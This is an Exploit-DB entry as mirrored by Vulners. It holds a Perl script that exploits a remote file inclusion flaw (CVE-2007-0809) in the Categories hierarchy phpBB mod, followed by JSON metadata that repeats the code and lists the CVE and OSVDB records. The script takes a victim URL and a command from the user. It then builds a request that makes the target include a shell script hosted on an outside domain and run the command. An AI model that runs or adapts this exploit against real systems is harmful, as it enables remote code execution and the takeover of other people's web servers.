Search...

Categories hierarchy phpBB Mod 2.1.2 phpbb_root_path RFI Exploit

2007-02-05T00:00:00

ID EDB-ID:3270
Type exploitdb
Reporter Mehmet Ince
Modified 2007-02-05T00:00:00

Description

Categories hierarchy phpBB Mod 2.1.2 (phpbb_root_path) RFI Exploit. CVE-2007-0809. Webapps exploit for php platform

                                        
                                            # (C) xoron
#
# [Name: Categories hierarchy v2.1.2 (phpbb_root_path) Remote File Include Exploit]
#
# [Script name: Ptifo mod-CH_212_installed
#
# [Author: xoron]
# [Exploit coded by xoron]
#
# [Download: http://sourceforge.net/project/showfiles.php?group_id=125710]
#
# [xoron.biz - xoron.info]
#
# [Thanx: str0ke, kacper, k1tk4t, SHiKA, can bjorn]
#
# [Tesekkurler: chaos, pang0, DJR]
# 
# [POC: /includes/class_template.php?phpbb_root_path=http://evilscripts?]
#
# [Vuln Codes: include($phpbb_root_path . 'includes/template.' . $phpEx); ]
#
#
$rfi = "class_template.php?phpbb_root_path="; 
$path = "/includes/";
$shell = "http://pang0.by.ru/shall/pang057.zz?cmd=";
print "Language: English // Turkish\nPlz Select Lang:\n"; $dil = &lt;STDIN&gt;; chop($dil);
if($dil eq "English"){
print "(c) xoron\n";
&ex;
}
elsif($dil eq "Turkish"){
print "Kodlayan xoron\n";
&ex;
}
else {print "Plz Select Languge\n"; exit;}
sub ex{
$not = "Victim is Not Vunl.\n" and $not_cmd = "Victim is Vunl but Not doing Exec.\n"
and $vic = "Victim Addres? with start http:// :" and $thx = "Greetz " and $diz = "Dictionary?:" and $komt = "Command?:"
if $dil eq "English";
$not = "Adreste RFI acigi Yok\n" and $not_cmd = "Adresde AcĂ˝k Var Fakat Kod Calismiyor\n"
and $vic = "Ornek Adres http:// ile baslayan:" and $diz = "Dizin?: " and $thx = "Tesekkurler " and $komt = "Command?:"
if $dil eq "Turkish";
print "$vic";
$victim = &lt;STDIN&gt;;
chop($victim);
print "$diz";
$dizn = &lt;STDIN&gt;;
chop($dizn);
$dizin = $dizn;
$dizin = "/" if !$dizn;
print "$komt";
$cmd = &lt;STDIN&gt;;
chop($cmd);
$cmmd = $cmd;
$cmmd = "dir" if !$cmd;
$site = $victim;
$site = "http://$victim" if !($victim =~ /http/);
$acacaz = "$site$dizin$rfi$shell$cmmd";
print "(c) xoron.info - xoron.biz\n$thx: pang0, chaos, can bjorn\n";
sleep 3;
system("start $acacaz");
}

# milw0rm.com [2007-02-05]

JSON Vulners Source

Initial Source

{"id": "EDB-ID:3270", "hash": "2b05375a67f89438efae83273027469c", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Categories hierarchy phpBB Mod 2.1.2 phpbb_root_path RFI Exploit", "description": "Categories hierarchy phpBB Mod 2.1.2 (phpbb_root_path) RFI Exploit. CVE-2007-0809. Webapps exploit for php platform", "published": "2007-02-05T00:00:00", "modified": "2007-02-05T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/3270/", "reporter": "Mehmet Ince", "references": [], "cvelist": ["CVE-2007-0809"], "lastseen": "2016-01-31T18:06:06", "history": [], "viewCount": 7, "enchantments": {"score": {"value": 7.3, "vector": "NONE", "modified": "2016-01-31T18:06:06"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-0809"]}, {"type": "osvdb", "idList": ["OSVDB:33722"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7191"]}], "modified": "2016-01-31T18:06:06"}, "vulnersScore": 7.3}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/3270/", "sourceData": "# (C) xoron\n#\n# [Name: Categories hierarchy v2.1.2 (phpbb_root_path) Remote File Include Exploit]\n#\n# [Script name: Ptifo mod-CH_212_installed\n#\n# [Author: xoron]\n# [Exploit coded by xoron]\n#\n# [Download: http://sourceforge.net/project/showfiles.php?group_id=125710]\n#\n# [xoron.biz - xoron.info]\n#\n# [Thanx: str0ke, kacper, k1tk4t, SHiKA, can bjorn]\n#\n# [Tesekkurler: chaos, pang0, DJR]\n# \n# [POC: /includes/class_template.php?phpbb_root_path=http://evilscripts?]\n#\n# [Vuln Codes: include($phpbb_root_path . 'includes/template.' . $phpEx); ]\n#\n#\n$rfi = \"class_template.php?phpbb_root_path=\"; \n$path = \"/includes/\";\n$shell = \"http://pang0.by.ru/shall/pang057.zz?cmd=\";\nprint \"Language: English // Turkish\\nPlz Select Lang:\\n\"; $dil = <STDIN>; chop($dil);\nif($dil eq \"English\"){\nprint \"(c) xoron\\n\";\n&ex;\n}\nelsif($dil eq \"Turkish\"){\nprint \"Kodlayan xoron\\n\";\n&ex;\n}\nelse {print \"Plz Select Languge\\n\"; exit;}\nsub ex{\n$not = \"Victim is Not Vunl.\\n\" and $not_cmd = \"Victim is Vunl but Not doing Exec.\\n\"\nand $vic = \"Victim Addres? with start http:// :\" and $thx = \"Greetz \" and $diz = \"Dictionary?:\" and $komt = \"Command?:\"\nif $dil eq \"English\";\n$not = \"Adreste RFI acigi Yok\\n\" and $not_cmd = \"Adresde Ac\u0102\u02ddk Var Fakat Kod Calismiyor\\n\"\nand $vic = \"Ornek Adres http:// ile baslayan:\" and $diz = \"Dizin?: \" and $thx = \"Tesekkurler \" and $komt = \"Command?:\"\nif $dil eq \"Turkish\";\nprint \"$vic\";\n$victim = <STDIN>;\nchop($victim);\nprint \"$diz\";\n$dizn = <STDIN>;\nchop($dizn);\n$dizin = $dizn;\n$dizin = \"/\" if !$dizn;\nprint \"$komt\";\n$cmd = <STDIN>;\nchop($cmd);\n$cmmd = $cmd;\n$cmmd = \"dir\" if !$cmd;\n$site = $victim;\n$site = \"http://$victim\" if !($victim =~ /http/);\n$acacaz = \"$site$dizin$rfi$shell$cmmd\";\nprint \"(c) xoron.info - xoron.biz\\n$thx: pang0, chaos, can bjorn\\n\";\nsleep 3;\nsystem(\"start $acacaz\");\n}\n\n# milw0rm.com [2007-02-05]\n", "osvdbidlist": ["33722"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{"cve": [{"lastseen": "2019-05-29T18:08:58", "bulletinFamily": "NVD", "description": "PHP remote file inclusion vulnerability in includes/class_template.php in Categories hierarchy (aka CH or mod-CH) 2.1.2 in ptirhiikmods allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.", "modified": "2017-10-19T01:30:00", "id": "CVE-2007-0809", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0809", "published": "2007-02-07T11:28:00", "title": "CVE-2007-0809", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nMail List Post: http://attrition.org/pipermail/vim/2007-February/001285.html\nISS X-Force ID: 32193\nGeneric Exploit URL: http://www.milw0rm.com/exploits/3270\nFrSIRT Advisory: ADV-2007-0493\n[CVE-2007-0809](https://vulners.com/cve/CVE-2007-0809)\nBugtraq ID: 22400\n", "modified": "2007-02-05T02:11:46", "published": "2007-02-05T02:11:46", "href": "https://vulners.com/osvdb/OSVDB:33722", "id": "OSVDB:33722", "title": "Categories hierarchy includes/class_template.php phpbb_root_path Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:23", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2007-02-07T00:00:00", "published": "2007-02-07T00:00:00", "id": "SECURITYVULNS:VULN:7191", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7191", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}